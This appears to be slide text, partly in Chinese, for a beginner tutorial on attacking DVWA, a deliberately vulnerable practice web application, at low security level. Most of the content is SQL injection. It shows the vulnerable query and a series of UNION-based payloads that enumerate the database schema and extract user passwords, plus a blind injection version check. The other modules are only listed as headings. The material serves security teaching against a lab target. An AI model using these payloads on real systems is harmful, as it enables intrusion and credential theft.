DVWA - Damn Vulnerable Web
Application
Dvwa low level
1.Brute Force
2.Command Injection
3.CSRF
4.File Inclusion
5.SQL Injection
SQL Injection Source
SQL 重組
$getid = "SELECT first_name, last_name FROM users WHERE user_id =
'$id'";
檢測是否有錯誤
1' and 1=1#
組合後變成
"select first_name,last_name form users where user_id = '1' and 1=1#";
5.SQL Injection
1' order by 1#
1' union all select 1,2#
1' union all select user(),database()#
1' union all select null,table_name from information_schema.tables#
1' union all select null,table_name from information_schema.tables where
table_schema = 'dvwa'#
1' union all select null,column_name from information_schema.columns where
table_schema ='dvwa'#
5.SQL Injection
1' union all select user,password from users#
6.Blind SQL Injection
差別
6.Blind SQL Injection
我們可以先
檢測版本
1' union all select null,substring(@@version,1,1)=4#
7.File Upload
8.Reflected Cross Site Scripting (XSS)
9.Stored Cross Site Scripting (XSS)
Dvwa medium level
To be continue
vance@hst.tw

Dvwa low level